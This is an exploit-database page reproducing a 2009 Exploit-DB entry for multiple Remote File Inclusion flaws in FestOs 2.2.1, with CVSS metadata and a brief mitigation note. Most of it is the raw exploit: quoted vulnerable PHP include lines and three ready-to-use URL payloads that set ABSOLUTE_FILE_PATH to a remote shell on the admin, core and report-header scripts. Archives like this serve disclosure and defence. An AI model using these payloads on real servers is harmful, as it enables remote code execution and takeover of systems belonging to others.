FestOs - exploit.company

vendor:

FestOs

by:

cr4wl3r

7.5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: FestOs

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: GNU/Linux

2009

FestOs <= 2.2.1 Multiple RFI Exploit

The FestOs version 2.2.1 is vulnerable to multiple Remote File Inclusion (RFI) exploits. Attackers can include malicious files from a remote server, leading to arbitrary code execution.

Mitigation:

To mitigate this vulnerability, it is recommended to update the FestOs software to a secure version or apply any available patches. Additionally, ensure that the ABSOLUTE_FILE_PATH parameter is properly sanitized and validated.

Source

Exploit-DB raw data:

##################################################################
## Exploit Title: FestOs <= 2.2.1 Multiple RFI Exploit          ##
## Date: 19-12-2009                                             ##
## Author: cr4wl3r                                              ##
## Software Link: http://code.google.com/p/festos/downloads/list##
## Version: N/A                                                 ##
## Tested on: GNU/LINUX                                         ##
##################################################################

~ Code : [reports_placement.php]

<?php 
$title = "Jury Sheet Report";

require_once($config['ABSOLUTE_FILE_PATH'].'core/core.php');
if($_SESSION["roleID"] > $reports) {
   header("Location:index.php");
}
include "includes/reportheader.php";
?>


~ 3xplo!t :

[festos_path]/admin/reports_placement.php?ABSOLUTE_FILE_PATH=[Shell]


~ Code : [FestOS.php]

require_once($config['ABSOLUTE_FILE_PATH']."core/sessions.php");


~ 3xplo!t :

[festos_path]/core/FestOS.php?ABSOLUTE_FILE_PATH=[Shell]



~ Code : [reportheader.php]

require_once($config['ABSOLUTE_FILE_PATH'].'core/core.php');


~ 3xplo!t :

[festos_path]/admin/includes/reportheader.php?ABSOLUTE_FILE_PATH=[Shell]


and more...